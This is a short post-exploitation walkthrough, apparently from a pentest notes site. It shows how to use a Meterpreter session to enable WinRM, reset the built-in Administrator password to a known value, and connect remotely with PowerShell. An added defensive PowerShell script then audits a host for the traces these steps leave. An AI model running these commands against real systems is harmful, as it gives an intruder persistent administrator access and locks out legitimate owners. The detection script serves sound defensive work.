Enable WinRM with metasploit
- Post
WinRM uses the default ports 5985 and 5986.
- Exploit the target
- Open meterpreter session
- Load meterpreter Powershell
load powershell
- Enable WinRM
powershell_execute 'Enable-PSRemoting -Force'
- Change the administrator password
powershell_execute 'net user administrator Passw0rd1_123'
- From the attacking machine, use PowerShell on Linux (pwsh) to connect to the target through a PSSession
pwsh
$credentials = Get-Credential   # user: administrator, password: Passw0rd1_123
Enter-PSSession -ComputerName x.x.x.x -Authentication Negotiate -Credential $credentials
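The sequence above leaves a distinct footprint on the host: a WinRM listener and firewall rule that were not there before, and a reset of the built-in Administrator password. The following audit script is an added example, not part of the original note; it runs in an elevated PowerShell on the Windows host being checked and assumes account-management auditing is enabled so that Security event 4724 is recorded.

```powershell
# Added audit example (not from the original note): collects the traces that
# Enable-PSRemoting and 'net user administrator <pw>' leave on a host.
# Run in an elevated PowerShell; assumes Security log auditing of account management.

$report = [ordered]@{}

# 1. Is the WinRM service running, and is it set to start automatically?
$svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
$report['WinRM service'] = if ($svc) { "$($svc.Status) / $($svc.StartType)" } else { 'not installed' }

# 2. Which WS-Management listeners exist? Enable-PSRemoting creates an HTTP one on 5985.
$report['Listeners'] = Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
    ForEach-Object {
        $props = Get-ChildItem -Path $_.PSPath
        '{0}:{1}' -f ($props | Where-Object Name -eq 'Transport').Value,
                     ($props | Where-Object Name -eq 'Port').Value
    }

# 3. Are 5985/5986 actually bound, and is an inbound firewall rule enabled for them?
$report['Sockets'] = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalPort -in 5985, 5986 } |
    ForEach-Object { "$($_.LocalAddress):$($_.LocalPort)" }
$report['Firewall rules'] = Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -ErrorAction SilentlyContinue |
    Where-Object Enabled -eq 'True' | Select-Object -ExpandProperty DisplayName

# 4. When was the built-in Administrator (RID 500) password last set?
#    'net user administrator <pw>' updates this timestamp.
$admin = Get-LocalUser | Where-Object { $_.SID -like 'S-1-5-21-*-500' }
$report['Admin PasswordLastSet'] = $admin.PasswordLastSet

# 5. Security event 4724 ("An attempt was made to reset an account's password")
#    is what 'net user <name> <password>' generates. Show the last 7 days,
#    with the target account and the account that performed the reset.
$report['Recent 4724 events'] = Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4724; StartTime = (Get-Date).AddDays(-7)
    } -ErrorAction SilentlyContinue |
    ForEach-Object { '{0}  target={1}  by={2}' -f $_.TimeCreated,
        $_.Properties[0].Value, $_.Properties[4].Value }

$report
```

A fresh listener together with a recent PasswordLastSet and a 4724 whose subject is not a known administrator is the exact combination the procedure above produces.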